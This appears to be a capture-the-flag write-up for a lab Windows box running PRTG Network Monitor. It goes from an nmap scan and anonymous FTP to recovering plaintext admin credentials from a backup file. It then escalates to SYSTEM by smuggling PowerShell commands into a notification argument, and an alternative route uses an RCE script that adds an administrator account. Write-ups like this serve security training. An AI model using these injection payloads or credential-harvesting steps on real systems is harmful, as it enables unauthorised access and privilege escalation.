Nmap scan report for 10.10.10.152 Host is up (0.040s latency). Not shown: 65522 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 02-03-19 12:18AM 1024 .rnd | 02-25-19 10:15PM <DIR> inetpub | 07-16-16 09:18AM <DIR> PerfLogs | 02-25-19 10:56PM <DIR> Program Files | 02-03-19 12:28AM <DIR> Program Files (x86) | 02-03-19 08:08AM <DIR> Users |_02-25-19 11:49PM <DIR> Windows | ftp-syst: |_ SYST: Windows_NT 80/tcp open http Indy httpd 220.127.116.1146 (Paessler PRTG bandwidth monitor) |_http-favicon: Unknown favicon MD5: 36B3EF286FA4BEFBB797A0966B456479 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: PRTG/18.104.22.16846 | http-title: Welcome | PRTG Network Monitor (NETMON) |_Requested resource was /index.htm |_http-trane-info: Problem with XML parsing of /evox/about 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.70%E=4%D=5/10%OT=21%CT=1%CU=35098%PV=Y%DS=2%DC=T%G=Y%TM=5CD5821 OS:6%P=x86_64-unknown-linux-gnu)SEQ(SP=105%GCD=1%ISR=10A%II=I%TS=A)SEQ(SP=1 OS:05%GCD=1%ISR=10A%CI=RD%II=I%TS=A)SEQ(SP=105%GCD=1%ISR=10A%TS=9)OPS(O1=M5 OS:4DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54DNW8ST11%O OS:6=M54DST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%D OS:F=Y%T=80%W=2000%O=M54DNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0 OS:%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S= OS:Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y OS:%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R OS:%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T= OS:80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z OS:)
TCP Sequence Prediction: Difficulty=261 (Good luck!) IP ID Sequence Generation: Busy server or unknown class Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
We can see that the ftp permits the anonymous login and that the root of the ftp server is C:\, so we can read the flag stored in C:\Users\Public\user.txt using ftp (port 21).
The index of the website on the port 80 is a PRTG Network Monitor login page :
And we can see in the bottom right that there’s the version of the software : 22.214.171.1246. Searching on duckduckgo for some vulnerabilities related to this version I found this link that shows that in the version of PRTG between 17.4.35 and 18.1.37 the credentials were stored in plain in text in a log file in the ProgramData directory. We can download all the files in the C:\ProgramData\Paessler\PRTG Network Monitor using ftp and after some search using grep or vim we can find that the password is in the PRTG Configuration.old.bak with the username prtgadmin.
username : prtgadmin
password : PrTg@dmin2018
However the password is not valid anymore because the file was from 2018 and we are in 2019, but if we change it from PrTg@dmin2018 to PrTg@dmin2019 we can login into the site.
We can now go in setup->notifications and add a new notification which executes a ps1 script that is located in : C:\Program Files (x86)\PRTG Network Monitor\Notifications\EXE. If we go with ftp into that directory we can see that there are two files :
# Demo 'Powershell' Notification for Paessler Network Monitor # Writes current Date/Time into a File # # How to use it: # # Create a exe-notification on PRTG, select 'Demo Exe Notifcation - OutFile.ps1' as program, # The Parametersection consists of one parameter: # # - Filename # # e.g. # # "C:\temp\test.txt" # # Note that the directory specified must exist. # Adapt Errorhandling to your needs. # This script comes without warranty or support.
The script writes the current date into the file specified as argument, but if we pass to the argument test.txt;whoami > "C:\ProgramData\Paessler\nothing.txt" we can check who is the user that executes the program. If it is nt authority\system we can copy the root flag and read it.
Form to create the notification
We can now save and click in the send notification button :
Now we need to use ftp to check if the file has being created.
1 2 3 4 5 6 7 8 9 10 11 12 13
ftp> pwd 257 "/ProgramData/Paessler" is current directory. ftp> ls -la 200 PORT command successful. 150 Opening ASCII mode data connection. 05-17-19 05:01AM 44 nothing.txt 05-17-19 04:45AM <DIR> PRTG Network Monitor 226 Transfer complete. ftp> get nothing.txt 200 PORT command successful. 125 Data connection already open; Transfer starting. 226 Transfer complete. 44 bytes received in 0.0314 seconds (1.37 kbytes/s)
Luckily the nothing.txt file contains nt authority\system. Now what we need to do is to change the argument of the notification that we’ve just created to : test.txt; Copy-Item "C:\Users\Administrator\Desktop\root.txt" -Destination "C:\ProgramData\Paessler\nothing.txt. After saving we can resend the notification and check if the file nothing.txt has been modified. We can download again the file and see that there’s the root flag :D. The last thing to do is to remove the file (maybe other users using ftp can download the file and read the root flag), to do so we have to set in the notification’s argument : test.txt; Remove-Item C:\ProgramData\Paessler\nothing.txt and resend the notification.
Pwn Root Alternative
At this point we can check the web service at the address http://10.10.10.152/index.htm. From this point we know that in the server is installed PRTG which is network monitor program with a previous vulnerability. In fact, after digging a bit, we find out that the program used to stored plain password, using no encryption mechanism. The location where it stores configuration and data is the following C:\ProgramData/Paessler/PRTG Network Monitor and the file we are looking for is Configuration.old.bak, an old backup.
If we open it, we see that there are the admin credentials:
Although, logging with those credentials return an error, but it could probably be due to the year in the password. Changing into PrTg@dmin2019 is the solution!
Now that we are logged, we can kindly use the script PRTG-Network-Monitor-RCE to create a privileged user thanks to we can connect via smb and retrieve the root flag. Notice that we need to insert as parameter the cookie set by this website (the ones once logged).
# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and add it to the script. # run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!'
[+] Finding open SMB ports.... [+] User SMB session establishd on 10.10.10.152... [+] IP: 10.10.10.152:445 Name: 10.10.10.152 Disk Permissions ---- ----------- C$ READ, WRITE .Users\Administrator\Desktop\ dw--w--w-- 0 Sun Feb 3 05:35:23 2019 . dw--w--w-- 0 Sun Feb 3 05:35:23 2019 .. -r--r--r-- 282 Sun Feb 3 13:08:38 2019 desktop.ini -r--r--r-- 33 Sun Feb 3 05:35:24 2019 root.txt